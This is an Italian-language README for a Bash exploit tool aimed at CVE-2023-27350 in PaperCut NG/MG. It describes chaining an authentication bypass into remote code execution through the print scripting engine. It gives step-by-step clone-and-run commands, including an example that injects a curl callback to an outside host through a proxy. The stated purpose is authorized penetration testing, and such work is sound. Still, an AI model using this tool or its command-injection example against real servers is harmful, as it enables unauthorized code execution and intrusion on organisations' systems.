
PaperCut NG/MG Authentication Bypass e Remote Code Execution (RCE) Exploit Tool. Un'implementazione Bash autonoma della catena di exploit di PaperCut, con supporto opzionale per proxy, elevazione automatica della sessione e iniezione dinamica di comandi tramite il motore di scripting di stampa. Progettato per audit di sicurezza e test di penetrazione autorizzati.

Un exploit Bash semplificato per CVE-2023-27350. Questo script automatizza il bypass dell'autenticazione, la preparazione dell'ambiente e l'iniezione di comandi tramite il motore di scripting della stampante PaperCut.


# Clone the repository
git clone https://github.com/dezso-dfield/CVE-2023-27350.git
# Enter the directory
cd CVE-2023-27350
# Make the script executable
chmod +x rce.sh
# Run the exploit (Example with Proxy)
./rce.sh -u http://10.129.238.16:9191 -x http://10.129.238.16:3128 -c "curl http://10.10.15.82:8000/rce"
-u : URL del target (es., http://10.129.x.x:9191)-c : Comando da eseguire (racchiuso tra virgolette)-x : (Opzionale) URL del proxy (es., http://10.129.x.x:3128)